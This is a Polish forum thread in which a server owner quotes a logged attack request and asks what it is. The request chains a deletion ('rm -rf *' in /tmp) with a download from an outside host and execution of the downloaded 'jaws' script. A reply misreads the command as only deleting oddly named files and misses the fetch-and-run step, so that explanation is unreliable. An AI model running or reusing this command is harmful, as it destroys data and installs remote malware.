![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 328 Pomógł: 3 Dołączył: 10.07.2016 Skąd: UK-raine Ostrzeżenie: (0%) ![]() ![]() |
Hel-lo wszystkim
Jeśli macie a pewnie niektórzy maja z pewnościa .. co to może być ? GET /shell?cd+/tmp;rm+-rf+*;wget+ kreekxassa.ml/jaws;sh+/tmp/jaws" 400 0 "-" "-" wyglada na formę ataku ale moje doświadczenie w temacie "server security" jest stosunkowo niewielkie. Faktem jest, że po tym mój serwer przez kilk aminut był całkowicie martwy .... Macie jakieś wytłumaczenie ? Pozdrówka phpamator Ten post edytował phpamator 11.07.2022, 09:18:54 |
|
|
![]() |
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 623 Pomógł: 144 Dołączył: 22.12.2010 Ostrzeżenie: (0%) ![]() ![]() |
Próba wykonania komend systemowych przez skrypt 'shell' tak jak nospor wyżej pisał, a dokładniej to atakujący chciał usunac jakies pliki z koncowka *.wget, plik jaws;sh z katalogu kreekxassa.ml i plik jaws w /tmp, sprawdz profilaktycznie czy nie masz jakichs sladow z tymi plikami, jesli masz to masz zainfekowaną stronę i mozliwe ze caly serwer.
|
|
|
![]() ![]() |
![]() |
Aktualny czas: 10.10.2025 - 06:49 |